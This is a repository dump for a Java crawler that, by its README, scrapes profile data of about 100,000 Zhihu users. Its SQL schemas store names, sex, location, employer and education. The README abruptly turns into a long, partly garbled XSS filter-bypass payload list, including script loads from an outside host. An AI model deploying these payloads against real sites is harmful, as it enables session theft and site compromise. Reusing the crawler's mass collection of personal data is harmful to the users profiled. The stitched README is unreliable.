├── .gitignore ├── README.md ├── ZhihuSpriderGitHub.rar ├── userurl.sql └── zhihuuser.sql /.gitignore: -------------------------------------------------------------------------------- 1 | # Compiled Object files, Static and Dynamic libs (Shared Objects) 2 | *.o 3 | *.a 4 | *.so 5 | 6 | # Folders 7 | _obj 8 | _test 9 | 10 | # Architecture specific extensions/prefixes 11 | *.[568vq] 12 | [568vq].out 13 | 14 | *.cgo1.go 15 | *.cgo2.c 16 | _cgo_defun.c 17 | _cgo_gotypes.go 18 | _cgo_export.* 19 | 20 | _testmain.go 21 | 22 | *.exe 23 | *.test 24 | *.prof 25 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # JavaZhiHuSpider 2 | ### java知乎爬虫:爬取用户信息 已爬10w(理论能爬完所有关注了任意话题的用户信息) 3 | ### 没有使用框架,httpclient连接池+线程池+正则实现. 4 | 5 | ### 厚颜无耻的挂上博客[HacL](http://yhis.me)+求波星 :) 6 | 7 | 8 | 代码过滤: 9 | medium--> 双写绕过:ript>alert(/xss/) 10 | 大小写混淆绕过: 11 | high-->通过img、body等标签的事件或者iframe等标签的src注入恶意的js代码: 12 | 13 | prompt(‘qq’) 14 | onmouseover=’alert(xss)’ 15 | onmouseover=’prompt(qq)’ 16 | 17 | >"'> 18 | >"'> 19 |
20 | 21 | "+alert('XSS')+" 22 | '> 23 | ='> 24 | 25 | 26 | alert('XSS') 27 | 28 | %0a%0a.jsp 29 | %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e 30 | %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e 31 | %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html 32 | 33 | a.jsp/ 34 | "> 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | "";'>out 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 |
51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 |
59 |
60 |
61 | 62 | 63 | alert('XSS'); 64 | .XSS{background-image:url("javascript.:alert('XSS')");} 65 | BODY{background:url("javascript.:alert('XSS')")} 66 | 67 | getURL("javascript.:alert('XSS')") 68 | a="get";b="URL";c="javascript.:";d="alert('XSS');";eval(a+b+c+d); 69 | 70 | "> <" 71 | 72 | 74 | "SRC="http://xss.ha.ckers.org/a.js"> 75 | 76 | '"SRC="http://xss.ha.ckers.org/a.js"> 77 | PTSRC="http://xss.ha.ckers.org/a.js"> 78 | link 79 | javascript:alert(1); 80 | javascript:alert(2); 81 | javascript:alert(3); 82 | javascript:alert(4); 83 | javascript:alert(5); 84 | javascript:alert(6); 85 | javascript:alert(7); 86 | '`"><\x3Cscript>javascript:alert(8) 87 | '`"><\x00script>javascript:alert(9) 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | \x3Cscript>javascript:alert(75) 154 | '"`> 155 | 159 | 160 | --> --> 161 | --> 162 | --> 163 | --> 164 | `"'>

167 | test 168 | test 169 | test 170 | test 171 | test 172 | test 173 | test 174 | test 175 | test 176 | test 177 | test 178 | test 179 | test 180 | test 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | "'`>ABC
DEF 189 | "'`>ABC
DEF 190 | 191 | 192 | 193 | '`"><\x3Cscript>javascript:alert(115) 194 | '`"><\x00script>javascript:alert(116) 195 | "'`><\x3Cimg src=xxx:x onerror=javascript:alert(117)> 196 | "'`><\x00img src=xxx:x onerror=javascript:alert(118)> 197 | 198 | 199 | 200 | 201 | javascript:alert(123); 202 | javascript:alert(124); 203 | javascript:alert(125); 204 | javascript:alert(126); 205 | javascript:alert(127); 206 | javascript:alert(128); 207 | javascript:alert(129); 208 | ABC
DEF 209 | ABC
DEF 210 | ABC
DEF 211 | ABC
DEF 212 | ABC
DEF 213 | ABC
DEF 214 | ABC
DEF 215 | ABC
DEF 216 | ABC
DEF 217 | ABC
DEF 218 | ABC
DEF 219 | ABC
DEF 220 | ABC
DEF 221 | ABC
DEF 222 | ABC
DEF 223 | ABC
DEF 224 | ABC
DEF 225 | ABC
DEF 226 | ABC
DEF 227 | ABC
DEF 228 | ABC
DEF 229 | ABC
DEF 230 | ABC
DEF 231 | ABC
DEF 232 | ABC
DEF 233 | ABC
DEF 234 | ABC
DEF 235 | test 236 | test 237 | test 238 | test 239 | test 240 | test 241 | test 242 | test 243 | test 244 | test 245 | test 246 | test 247 | test 248 | test 249 | test 250 | test 251 | test 252 | test 253 | test 254 | test 255 | test 256 | test 257 | test 258 | test 259 | test 260 | test 261 | test 262 | test 263 | test 264 | test 265 | test 266 | test 267 | test 268 | test 269 | test 270 | test 271 | test 272 | test 273 | test 274 | test 275 | test 276 | test 277 | test 278 | test 279 | test 280 | test 281 | test 282 | test 283 | test 284 | test 285 | test 286 | test 287 | test 288 | test 289 | test 290 | test 291 | test 292 | `"'> 293 | `"'> 294 | `"'> 295 | `"'> 296 | `"'> 297 | `"'> 298 | `"'> 299 | `"'> 300 | `"'> 301 | `"'> 302 | "`'> 303 | "`'> 304 | "`'> 305 | "`'> 306 | "`'> 307 | "`'> 308 | "`'> 309 | "`'> 310 | "`'> 311 | "`'> 312 | "`'> 313 | "`'> 314 | "`'> 315 | "`'> 316 | "`'> 317 | "`'> 318 | "`'> 319 | "`'> 320 | "`'> 321 | "`'> 322 | "`'> 323 | "`'> 324 | "`'> 325 | "`'> 326 | "`'> 327 | "`'> 328 | "`'> 329 | "`'> 330 | "`'> 331 | "`'> 332 | "`'> 333 | "`'> 334 | "`'> 335 | "`'> 336 | "`'> 337 | "`'> 338 | "`'> 339 | "/> 340 | "/> 341 | "/> 342 | "/> 343 | "/> 344 | "/> 345 | "/> 346 | "/> 347 | "/> 348 | javascript:alert(270) 349 | javascript:alert(271) 350 | javascript:alert(272) 351 | javascript:alert(273) 352 | javascript:alert(274) 353 | javascript:alert(275) 354 | javascript:alert(276) 355 | `"'> 356 | `"'> 357 | `"'> 358 | `"'> 359 | `"'> 360 | `"'> 361 | `"'> 362 | 383 | 384 | alert(308)0 385 |
386 | 387 | 388 | 389 | 390 | "> 393 | "> 394 | "> 395 | "> 396 | 397 | <% foo> 398 |
399 | 400 | 401 | 402 | 403 | 404 | 405 | 406 | 407 | 408 | 409 | 410 | 411 | 412 | 413 | 414 | 415 | 416 | 417 | 418 | 419 | 420 | 421 | 422 | 423 | 424 | 425 | 426 | 427 | 428 | 429 | 430 | 431 | 432 | 433 | XXX 434 | 435 | 436 | 437 | <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(361)></a>"> 438 | <!--[if]><script>javascript:alert(362)</script --> 439 | <!--[if<img src=x onerror=javascript:alert(363)//]> --> 440 | <object id="x" classid="clsid:CB927D3662-4FF7-4a9e-A36669-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C3667-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(366)" style="behavior:url(#x);"><param name=postdomevents /></object> 441 | <a style="-o-link:'javascript:javascript:alert(367)';-o-link-source:current">X 442 | <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(368)'}{}*{-o-link-source:current}]{color:red};</style> 443 | <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(369))%7d 444 | <style>@import "data:,*%7bx:expression(javascript:alert(370))%7D";</style> 445 | <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(371);">XXX</a></a><a href="javascript:javascript:alert(371)">XXX</a> 446 | <// style=x:expression\28javascript:alert(375)\29> 447 | <style>*{x:expression(javascript:alert(376))}</style> 448 | <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(378));">X 449 | <script>({set/**/$($){_/**/setter=$,_=javascript:alert(384)}}).$=eval</script> 450 | <script>({0:#0=eval/#0#/#0#(javascript:alert(385))})</script> 451 | <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(386)}),x</script> 452 | <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(387)')()</script> 453 | <meta charset="mac-farsi">¼script¾javascript:alert(390)¼/script¾ 454 | X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(391)` > 455 | 
392<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh䎒vior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(392)>`> 456 | 393<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(393)>> 457 | 395<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(395) strokecolor=white strokeweight=395000px from=0 to=395000 /></a> 458 | <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(396)">XXX</a> 459 | <event-source src="%(event)s" onload="javascript:alert(399)"> 460 | <a href="javascript:javascript:alert(400)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> 461 | <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<img񡿹src=x:x񡿹onerror񡿹=javascript:alert(401)>"> 462 | <script>javascript:alert(405)</script> 463 | <IMG SRC="javascript:javascript:alert(406);"> 464 | <IMG SRC=javascript:javascript:alert(407)> 465 | <IMG SRC=`javascript:javascript:alert(408)`> 466 | <FRAMESET><FRAME SRC="javascript:javascript:alert(410);"></FRAMESET> 467 | <BODY ONLOAD=javascript:alert(411)> 468 | <BODY ONLOAD=javascript:javascript:alert(412)> 469 | <IMG SRC="jav ascript:javascript:alert(413);"> 470 | <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(414)> 471 | <IMG SRC="javascript:javascript:alert(417)" 472 | <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(419);"> 473 | <IMG DYNSRC="javascript:javascript:alert(420)"> 474 | <IMG LOWSRC="javascript:javascript:alert(421)"> 475 | <BGSOUND SRC="javascript:javascript:alert(422);"> 476 | <BR SIZE="&{javascript:alert(423)}"> 477 | <LINK REL="stylesheet" HREF="javascript:javascript:alert(425);"> 478 | <STYLE>li {list-style-image: 
url("javascript:javascript:alert(429)");}</STYLE><UL><LI>XSS 479 | <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(430);"> 480 | <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(431);"> 481 | <IFRAME SRC="javascript:javascript:alert(432);"></IFRAME> 482 | <TABLE BACKGROUND="javascript:javascript:alert(433)"> 483 | <TABLE><TD BACKGROUND="javascript:javascript:alert(434)"> 484 | <DIV STYLE="background-image: url(javascript:javascript:alert(435))"> 485 | <DIV STYLE="width:expression(javascript:alert(436));"> 486 | <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(437))"> 487 | <XSS STYLE="xss:expression(javascript:alert(438))"> 488 | <STYLE TYPE="text/javascript">javascript:alert(439);</STYLE> 489 | <STYLE>.XSS{background-image:url("javascript:javascript:alert(440)");}</STYLE><A CLASS=XSS></A> 490 | <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(441)")}</STYLE> 491 | <!--[if gte IE 4]><SCRIPT>javascript:alert(442);</SCRIPT><![endif]--> 492 | <BASE HREF="javascript:javascript:alert(443);//"> 493 | <OBJECT classid=clsid:ae24fdae-03c6-445445d445-8b76-0080c744f389><param name=url value=javascript:javascript:alert(445)></OBJECT> 494 | <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(446)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> 495 | <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(447)</SCRIPT>"></BODY></HTML> 496 | <form id="test" /><button form="test" formaction="javascript:javascript:alert(450)">X 497 | <body 
onscroll=javascript:alert(451)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> 498 | <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(452)"> 499 | <STYLE>a{background:url('s454' 's2)}@import javascript:javascript:alert(454);');}</STYLE> 500 | <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(455)&&;&&<&&/script&&> 501 | <SCRIPT onreadystatechange=javascript:javascript:alert(456);></SCRIPT> 502 | <style onreadystatechange=javascript:javascript:alert(457);></style> 503 | <?xml version="458.0"?><html:html xmlns:html='http://www.w3.org/458999/xhtml'><html:script>javascript:alert(458);</html:script></html:html> 504 | <embed code=javascript:javascript:alert(460);></embed> 505 | <frameset onload=javascript:javascript:alert(462)></frameset> 506 | <object onerror=javascript:javascript:alert(463)> 507 | <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(465);">]]</C><X></xml> 508 | <IMG SRC=&{javascript:alert(466);};> 509 | <a href="javAascript:javascript:alert(467)">test467</a> 510 | <a href="javaascript:javascript:alert(468)">test468</a> 511 | <iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(470)&gt;>"> 512 | ';alert(471))//';alert(471))//"; 513 | alert(472))//";alert(472))//-- 514 | ></SCRIPT>">'><SCRIPT>alert(473))</SCRIPT> 515 | <IMG SRC="javascript:alert(476);"> 516 | <IMG SRC=javascript:alert(477)> 517 | <IMG SRC=JaVaScRiPt:alert(478)> 518 | <IMG SRC=javascript:alert(479)> 519 | <IMG SRC=`javascript:alert(480)`> 520 | <a onmouseover="alert(481)">xxs link</a> 521 | <a onmouseover=alert(482)>xxs link</a> 522 | <IMG """><SCRIPT>alert(483)</SCRIPT>"> 523 | <IMG SRC=javascript:alert(484))> 524 | <IMG SRC=# onmouseover="alert(485)"> 525 | <IMG SRC= onmouseover="alert(486)"> 526 | <IMG onmouseover="alert(487)"> 527 | <IMG SRC="jav 
ascript:alert(491);"> 528 | <IMG SRC="jav ascript:alert(492);"> 529 | <IMG SRC="jav ascript:alert(493);"> 530 | <IMG SRC="jav ascript:alert(494);"> 531 | perl -e 'print "<IMG SRC=java\0script:alert(495)>";' > out 532 | <IMG SRC="  javascript:alert(496);"> 533 | <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(498)> 534 | <<SCRIPT>alert(500);//<</SCRIPT> 535 | <IMG SRC="javascript:alert(503)" 536 | \";alert(505);// 537 | 538 | 539 | 540 | 541 | 542 |
562 |
563 |
564 |
565 |
566 | 567 | alert(549)'); ?> 568 | 569 | +ADw-SCRIPT+AD4-alert(553);+ADw-/SCRIPT+AD4- 570 | /*%00*/alert(577)/*%00*/ 573 | 574 |
659 | < 660 | <"';alert(806))//\';alert(806))//";alert(806))//\";alert(806))//-->">'> 661 | ';alert(807))//\';alert(807))//";alert(807))//\";alert(807))//-->">'>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 663 | -------------------------------------------------------------------------------- /ZhihuSpriderGitHub.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yhisme/JavaZhiHuSpider/c0d8503caf6bef33a1cc0718225a744783afc097/ZhihuSpriderGitHub.rar -------------------------------------------------------------------------------- /userurl.sql: -------------------------------------------------------------------------------- 1 | 2 | CREATE TABLE `userurl` ( 3 | `url` varchar(20) NOT NULL, 4 | PRIMARY KEY (`url`) 5 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4; 6 | -------------------------------------------------------------------------------- /zhihuuser.sql: -------------------------------------------------------------------------------- 1 | CREATE TABLE `zhihuuser` ( 2 | `name` varchar(30) DEFAULT NULL, 3 | `sex` varchar(5) DEFAULT NULL, 4 | `location` varchar(30) DEFAULT NULL, 5 | `bussiness` varchar(30) DEFAULT NULL, 6 | `employment` varchar(30) DEFAULT NULL, 7 | `postion` varchar(30) DEFAULT NULL, 8 | `education` varchar(30) DEFAULT NULL, 9 | `education_extra` varchar(30) DEFAULT NULL, 10 | `suppose` int(11) DEFAULT NULL, 11 | `thanks` int(11) DEFAULT NULL, 12 | `question` int(11) DEFAULT NULL, 13 | `answer` int(11) DEFAULT NULL, 14 | `article` int(11) DEFAULT NULL, 15 | `followers` int(11) DEFAULT NULL, 16 | `following` int(11) DEFAULT NULL, 17 | `bewatched` int(11) DEFAULT NULL 18 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4; 19 | --------------------------------------------------------------------------------